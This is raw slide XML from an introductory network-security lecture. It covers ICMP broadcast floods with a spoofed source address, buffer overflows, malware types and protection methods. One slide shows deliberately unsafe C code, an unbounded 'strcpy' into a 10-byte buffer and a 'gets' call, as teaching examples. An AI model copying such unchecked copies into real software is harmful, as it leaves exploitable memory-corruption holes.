              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> sending a series of broadcasts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ICMP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>requests from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the sender's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>address substituted for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-address of the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> victim. Responses would flood the victim's network. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="24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DoS Attack Using Ctrl+R</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2000160" y="1428840"/>
            <a:ext cx="4857480" cy="5486039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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5E3F9980-98AB-4AED-B2A2-0641D20851FB}"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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="12" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="13" fill="hold" nodeType="clickEffect">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="14" fill="hold" nodeType="withEffect">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetID="35" presetClass="entr"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additive="repl">
                                        <p:cTn id="17" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="18" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="720"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="19" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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marL="343080" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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D27B762B-8EA9-430F-AD5A-E6EB7F365CA8}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1357200" y="1571759"/>
            <a:ext cx="6143400" cy="514944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Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1428840"/>
            <a:ext cx="8929440" cy="521460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Examples:</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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>char buffer[10];</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>strcpy(buffer, argv[1]);</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>char *str = (char *)malloc(10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="749"/>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19" algn="l"/>
                <a:tab pos="5729400" algn="l"/>
                <a:tab pos="6178680" algn="l"/>
                <a:tab pos="6627960" algn="l"/>
                <a:tab pos="7077240" algn="l"/>
                <a:tab pos="7526160" algn="l"/>
                <a:tab pos="7975440" algn="l"/>
                <a:tab pos="8424720" algn="l"/>
                <a:tab pos="8874000" algn="l"/>
                <a:tab pos="9323280" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>gets (str); </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">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Browser plugins are often vulnerable (banking programs, flash,...)</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Allows you to embed and execute custom code</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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F17FBF3B-110B-4990-BE0A-9C7D477EFB2F}"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Security Threats</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="5143320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="9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Viruses </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="9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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>embed themselves in the executable code of other programs/documents</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="9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Network worms </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(separate programs). </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="9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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Kido </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(12 million computers)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="9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Trojan programs</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="9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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>They hide their real identity </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>nature, do not apply </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>duplication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5786280" y="3429000"/>
            <a:ext cx="2963519" cy="297144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Security Threats</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1571759"/>
            <a:ext cx="8229240" cy="485748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i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ransomware programs</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="417851" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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Network exploration (port scanning, spyware) </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> programs</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="249"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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The human factor</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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D290385F-DE72-42F6-B5D9-798396795E98}"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Distribution of Attack Types</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428760" y="1481040"/>
            <a:ext cx="8071920" cy="5447880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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C7E1EC9D-3C91-4A94-AC4C-356A4253B285}"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1857240" y="466560"/>
            <a:ext cx="5311440" cy="890280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Security Methods</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="48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855F9943-8DC4-413C-AC8C-2BCD672C74A5}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2973240" y="2500200"/>
            <a:ext cx="3026880" cy="3533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214200" y="1644480"/>
            <a:ext cx="2214360" cy="2712600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372360" y="1643040"/>
            <a:ext cx="2571480" cy="257148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357120" y="214200"/>
            <a:ext cx="7143480" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95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The concept of network security. Example</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1981080"/>
            <a:ext cx="7772039" cy="2876040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="95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On-line banking</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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perform operations with the bank account and not be afraid that someone will steal your username / password or account information</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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the bank must be sure that it is the cardholder who performs the operations</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Security Methods</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="507168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C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Confidentiality:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>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encryption, virtual private networks (</a:t>
            </a:r>
            <a:r>
